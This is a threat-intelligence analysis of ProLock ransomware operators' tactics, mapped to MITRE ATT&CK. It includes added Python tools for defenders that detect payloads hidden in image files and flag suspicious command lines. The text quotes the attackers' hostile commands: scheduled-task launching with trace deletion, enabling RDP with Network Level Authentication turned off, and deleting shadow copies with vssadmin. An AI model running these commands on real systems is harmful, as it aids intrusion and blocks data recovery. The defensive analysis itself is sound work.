Unveiling ProLock: analysis of the new ransomware operators' actions using the MITRE ATT&CK matrix

The success of ransomware attacks on organizations around the world is encouraging more and more new attackers to enter the game. One of these newcomers is the group using the ProLock ransomware. It appeared in March 2020 as the successor of PwndLocker, which began operating at the end of 2019. ProLock attacks are aimed primarily at financial and healthcare organizations, government agencies and the retail sector. Recently, ProLock operators successfully attacked one of the largest ATM manufacturers, Diebold Nixdorf.

In this post, Oleg Skulkin, lead specialist at the Group-IB Computer Forensics Laboratory, covers the main tactics, techniques and procedures (TTPs) used by the ProLock operators. The article ends with a mapping to the MITRE ATT&CK Matrix, a public knowledge base that catalogues the targeted-attack techniques used by various cybercriminal groups.

Obtaining initial access

ProLock operators use two main initial compromise vectors: the QakBot (Qbot) Trojan, and unprotected RDP servers with weak passwords.

Compromise through an externally reachable RDP server is extremely popular among ransomware operators. Typically the attackers buy access to an already compromised server from third parties, but it can also be obtained by members of the group themselves.

The more interesting initial compromise vector is the QakBot malware. Previously this Trojan was associated with another ransomware family, MegaCortex. Now, however, it is used by the ProLock operators.

As a rule, QakBot is distributed through phishing campaigns. A phishing e-mail may contain an attached Microsoft Office document or a link to a file hosted on a cloud storage service such as Microsoft OneDrive.

There are also known cases of QakBot being loaded by another Trojan, Emotet, which is well known for its participation in campaigns distributing the Ryuk ransomware.

Execution

After the malicious document is downloaded and opened, the user is asked to enable macros. If that succeeds, PowerShell is launched, which downloads the QakBot payload from the command and control server and runs it.

It is important to note that the same applies to ProLock: the payload is extracted from a BMP or JPG file and loaded into memory using PowerShell. In some cases a scheduled task is used to launch PowerShell.

Batch script that runs ProLock through the Task Scheduler (the XML task definition and the script itself are deleted afterwards to remove traces):

rem Register a task from a pre-dropped XML definition, run it, then clean up
schtasks.exe /CREATE /XML C:\Programdata\WinMgr.xml /tn WinMgr
schtasks.exe /RUN /tn WinMgr
del C:\Programdata\WinMgr.xml
del C:\Programdata\run.bat

Persistence

If an RDP server was compromised and access obtained, valid accounts are used to gain access to the network. QakBot, for its part, has various persistence mechanisms. Most often the Trojan uses the Run registry key and creates tasks in the Task Scheduler:

[Screenshot: QakBot persistence via the Run registry key]

In some cases startup folders are used as well: a shortcut pointing to the loader is placed there.

Defense evasion

While communicating with the command and control server, QakBot periodically tries to update itself, so to avoid detection the malware can replace its current version with a new one. The executables are signed with a compromised or forged signature. The initial payload downloaded by PowerShell is stored on the C&C server with a PNG extension. Moreover, after execution it is overwritten with the legitimate calc.exe file.

Also, to hide its malicious activity, QakBot uses process injection, injecting code into explorer.exe.

As already mentioned, the ProLock payload is hidden inside a BMP or JPG file. This too can be regarded as a defense evasion technique.
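Hiding a payload in an image file usually means appending it after the image data: the file still opens as a picture, but it is longer than its own headers say. The following is an added example (not code from the original article, and not the ProLock loader) that a responder can run over suspicious BMP, JPEG and PNG files to find and carve such an appended "overlay" for the BMP/JPG case described above and the PNG/JPG extraction described later under achieving the final goal. The sample images and the fake payload are constructed inline; a real check would read files from disk.

```python
"""Find data appended after the structural end of a BMP, JPEG or PNG file.

Added example (not from the original article). A JPEG ends at its EOI marker,
a PNG at its IEND chunk and a BMP at the size declared in its header; anything
after that point is an overlay, which is where an image-hosted payload lives.
"""
import struct
import zlib

JPEG_SOI = b"\xff\xd8"
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _bmp_end(data):
    # BITMAPFILEHEADER: 'BM' followed by the uint32 LE total file size at offset 2.
    return struct.unpack_from("<I", data, 2)[0] if len(data) >= 14 else None


def _jpeg_end(data):
    # Walk marker segments. Inside entropy-coded data 0xFF is always followed by
    # 0x00 (stuffing) or 0xD0-0xD7 (restart), so the first other marker after SOS
    # ends the scan and the EOI marker (0xFFD9) ends the image. A naive
    # data.rfind(b"\xff\xd9") would instead stop at an EOI inside the payload.
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xD9:
            return i + 2
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            i += 2  # standalone marker without a length field
            continue
        if i + 4 > len(data):
            return None
        i += 2 + struct.unpack_from(">H", data, i + 2)[0]
        if marker == 0xDA:  # SOS: skip the entropy-coded bytes
            while i + 1 < len(data) and not (
                data[i] == 0xFF and data[i + 1] != 0x00 and not 0xD0 <= data[i + 1] <= 0xD7
            ):
                i += 1
    return None


def _png_end(data):
    # Chunk layout: uint32 BE length, 4-byte type, data, uint32 CRC. IEND is last.
    i = len(PNG_SIG)
    while i + 8 <= len(data):
        length = struct.unpack_from(">I", data, i)[0]
        ctype = data[i + 4:i + 8]
        i += 12 + length
        if ctype == b"IEND":
            return i
    return None


def image_end(data: bytes):
    """Offset just past the image's structural end, or None if not recognised."""
    if data.startswith(b"BM"):
        return _bmp_end(data)
    if data.startswith(JPEG_SOI):
        return _jpeg_end(data)
    if data.startswith(PNG_SIG):
        return _png_end(data)
    return None


def overlay(data: bytes) -> bytes:
    """Bytes appended after the image (empty if none or the format is unknown)."""
    end = image_end(data)
    return b"" if end is None or end > len(data) else data[end:]


def looks_like_pe(blob: bytes) -> bool:
    return blob.startswith(b"MZ")


# --- constructed minimal sample images (not real malware artefacts) ----------
def _sample_bmp() -> bytes:
    pixels = b"\x00\x00\xff\x00"  # one 24-bit pixel padded to 4 bytes
    dib = struct.pack("<IiiHHIIiiII", 40, 1, 1, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    size = 14 + len(dib) + len(pixels)
    return b"BM" + struct.pack("<IHHI", size, 0, 0, 14 + len(dib)) + dib + pixels


def _sample_jpeg() -> bytes:
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # stuffed FF00 and RST0 must not end the scan
    return JPEG_SOI + app0 + sos + scan + b"\xff\xd9"


def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def _sample_png() -> bytes:
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1 RGB, 8 bits per sample
    idat = zlib.compress(b"\x00\xff\x00\x00")          # filter byte + one pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


# Fake payload (constructed); it contains an EOI marker to show why rfind() is not enough.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 30 + b"\xff\xd9" + b"payload-tail"
CLEAN = {"bmp": _sample_bmp(), "jpg": _sample_jpeg(), "png": _sample_png()}
WITH_PAYLOAD = {name: img + FAKE_PAYLOAD for name, img in CLEAN.items()}


def report(samples):
    """{name: (overlay length, overlay starts with 'MZ')} for each sample."""
    return {name: (len(overlay(img)), looks_like_pe(overlay(img))) for name, img in samples.items()}


if __name__ == "__main__":
    print("clean:       ", report(CLEAN))
    print("with payload:", report(WITH_PAYLOAD))
```

An overlay that starts with "MZ" is the easy case; the loader the article describes may just as well store the payload encoded or encrypted, so a non-empty overlay of any content on an image dropped by PowerShell is the signal worth triaging, not only a recognisable PE header.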

Credential access

QakBot has keylogger functionality. In addition, it can download and run additional scripts, for example Invoke-Mimikatz, a PowerShell version of the well-known Mimikatz utility. The attackers can use such scripts to dump credentials.

Network reconnaissance

After obtaining access to privileged accounts, the ProLock operators perform network reconnaissance, which may include port scanning and analysis of the Active Directory environment. Besides various scripts, the attackers use AdFind, another tool popular among ransomware groups, to collect information about Active Directory.

Lateral movement

Traditionally, one of the most popular ways of moving through a network is the Remote Desktop Protocol. ProLock was no exception. The attackers have scripts in their arsenal for obtaining remote access to target hosts over RDP.

BAT script for obtaining access over RDP (note that the third command disables Network Level Authentication on the RDP listener, so a stolen password alone is enough to connect):

rem Allow incoming Remote Desktop connections
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
rem Open the Windows Firewall rule group for Remote Desktop
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
rem Turn off Network Level Authentication on the RDP-Tcp listener
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

To run scripts remotely, the ProLock operators use another popular tool, the PsExec utility from the Sysinternals Suite.

ProLock is launched on hosts using WMIC, the command-line interface to the Windows Management Instrumentation subsystem. This tool is becoming increasingly popular among ransomware operators.

Data collection

Like many other ransomware operators, the group using ProLock collects data from the compromised network to increase their chances of getting the ransom paid. Before exfiltration, the collected data is archived with the 7Zip utility.

Exfiltration

To upload the data, ProLock operators use Rclone, a command-line tool designed to synchronize files with various cloud storage services such as OneDrive, Google Drive, Mega and others. The attackers always rename the executable so that it looks like a legitimate system file.

Unlike their peers, the ProLock operators still do not have their own website for publishing the stolen data of companies that refused to pay the ransom.

Achieving the final goal

Once the data has been exfiltrated, the group deploys ProLock across the entire corporate network. The binary is extracted from a file with a PNG or JPG extension using PowerShell and injected into memory.

First, ProLock terminates the processes listed in a built-in list (interestingly, it compares only the first six characters of the process name, for example "winwor"), and stops services, including security-related ones such as CSFalconService (CrowdStrike Falcon), using the net stop command.

Then, like many other ransomware families, the attackers use the vssadmin utility to delete Windows shadow copies and to limit their size so that no new copies are created:

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
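Almost every step of the operators' playbook quoted on this page (the schtasks XML task, the RDP-enabling reg add commands, net stop against a security service, vssadmin shadow-copy deletion, PsExec and WMIC lateral movement, and a renamed Rclone) leaves a process-creation event with a distinctive command line. The following is an added example, not code from the original article, of a small rule set run over such events. The events are constructed Sysmon-style records with Image, OriginalFileName and CommandLine fields; the technique IDs follow the article's own ATT&CK mapping, and the rule patterns and the sample OriginalFileName values are assumptions to be tuned against real telemetry.

```python
"""Command-line detection rules for the ProLock operator TTPs described above.

Added example (not from the original article). Rules are (name, technique,
predicate) triples; a predicate takes one process-creation event (a dict).
"""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]


def _cmd(pattern: str) -> Callable[[Event], bool]:
    """Rule that matches a regex against the command line, case-insensitively."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: bool(rx.search(ev.get("CommandLine", "")))


def _renamed(original: str) -> Callable[[Event], bool]:
    """Rule that catches a known tool run under a different on-disk name.

    Compares the PE version-info OriginalFileName (as Sysmon logs it) with the
    image file name, which is how a renamed Rclone still gives itself away."""
    def check(ev: Event) -> bool:
        on_disk = ev.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        return ev.get("OriginalFileName", "").lower() == original and on_disk != original
    return check


RULES = [
    ("Scheduled task created from an XML file under ProgramData", "T1053",
     _cmd(r"\bschtasks(\.exe)?\s+/create\s+/xml\s+\S*programdata")),
    ("RDP enabled: fDenyTSConnections set to 0", "T1076",
     _cmd(r"\breg(\.exe)?\s+add\b.*fDenyTSConnections\b.*/d\s+0\b")),
    ("RDP NLA disabled: UserAuthentication set to 0", "T1076",
     _cmd(r"\breg(\.exe)?\s+add\b.*RDP-Tcp\b.*UserAuthentication\b.*/d\s+0\b")),
    ("Security service stopped with net stop", "T1089",
     _cmd(r"\bnet1?(\.exe)?\s+stop\s+\"?CSFalconService\b")),
    ("Shadow copies deleted", "T1490",
     _cmd(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b")),
    ("Shadow storage resized", "T1490",
     _cmd(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b")),
    ("Remote process creation via WMIC", "T1047",
     _cmd(r"\bwmic(\.exe)?\b.*\s/node:\S+.*\bprocess\s+call\s+create\b")),
    ("PsExec against a remote host", "T1077",
     _cmd(r"\bpsexec(64)?(\.exe)?\s+\\\\\S+")),
    ("Rclone running under a different file name", "T1036", _renamed("rclone.exe")),
]


def analyze(events: List[Event]) -> List[Dict[str, object]]:
    """Return one hit per (event, rule) pair that matched."""
    hits = []
    for idx, ev in enumerate(events):
        for name, technique, match in RULES:
            if match(ev):
                hits.append({"event": idx, "rule": name, "technique": technique})
    return hits


# Constructed sample telemetry: events 0-7 mirror the commands on this page, 8-9 are benign.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r"schtasks.exe /CREATE /XML C:\Programdata\WinMgr.xml /tn WinMgr"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": "net stop CSFalconService"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic /node:SRV01 process call create "cmd.exe /c C:\Programdata\run.bat"'},
    {"Image": r"C:\Tools\PsExec.exe", "OriginalFileName": "psexec.c",  # value constructed
     "CommandLine": r"PsExec.exe \\SRV02 -s cmd.exe /c C:\Programdata\run.bat"},
    {"Image": r"C:\Windows\svchost.exe", "OriginalFileName": "rclone.exe",  # value constructed
     "CommandLine": r"svchost.exe copy C:\Programdata\archive.7z remote:backup"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin list shadows"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": "schtasks /query /tn WinMgr"},
]


if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(f"event {hit['event']}: {hit['technique']}  {hit['rule']}")
```

The Rclone rule deliberately ignores the file name and the command line: the attackers rename the binary, so the stable handle is the version-info name or, better still, the file hash. The net stop rule names only the one service the article mentions; a production rule would carry the full list of EDR and backup services worth protecting.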

ProLock appends the extension .proLock, .pr0Lock or .proL0ck to each encrypted file and drops a [HOW TO RECOVER FILES].TXT file in every folder. This file contains instructions on how to decrypt the files, including a link to a site where the victim has to enter a unique ID and receive payment details.

Each ProLock sample contains information about the ransom amount: in this case 35 bitcoins, roughly $312,000 at the time.

Conclusion

Many ransomware operators use similar methods to achieve their goals. At the same time, some techniques are unique to each group. The number of cybercriminal groups using ransomware in their campaigns keeps growing. In some cases the same operators may take part in attacks involving different ransomware families, so we will increasingly see overlap in the tactics, techniques and procedures in use.

MITRE ATT&CK mapping

Technique IDs follow the ATT&CK version current when the article was written (before the mid-2020 sub-technique release); several of them have since been renumbered.

Tactic | Techniques
Initial Access (TA0001) | External Remote Services (T1133), Spearphishing Attachment (T1193), Spearphishing Link (T1192)
Execution (TA0002) | PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)
Persistence (TA0003) | Registry Run Keys / Startup Folder (T1060), Scheduled Task (T1053), Valid Accounts (T1078)
Defense Evasion (TA0005) | Code Signing (T1116), Deobfuscate/Decode Files or Information (T1140), Disabling Security Tools (T1089), File Deletion (T1107), Masquerading (T1036), Process Injection (T1055)
Credential Access (TA0006) | Credential Dumping (T1003), Brute Force (T1110), Input Capture (T1056)
Discovery (TA0007) | Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Service Scanning (T1046), Network Share Discovery (T1135), Remote System Discovery (T1018)
Lateral Movement (TA0008) | Remote Desktop Protocol (T1076), Remote File Copy (T1105), Windows Admin Shares (T1077)
Collection (TA0009) | Data from Local System (T1005), Data from Network Shared Drive (T1039), Data Staged (T1074)
Command and Control (TA0011) | Commonly Used Port (T1043), Web Service (T1102)
Exfiltration (TA0010) | Data Compressed (T1002), Transfer Data to Cloud Account (T1537)
Impact (TA0040) | Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490)

Source: www.habr.com
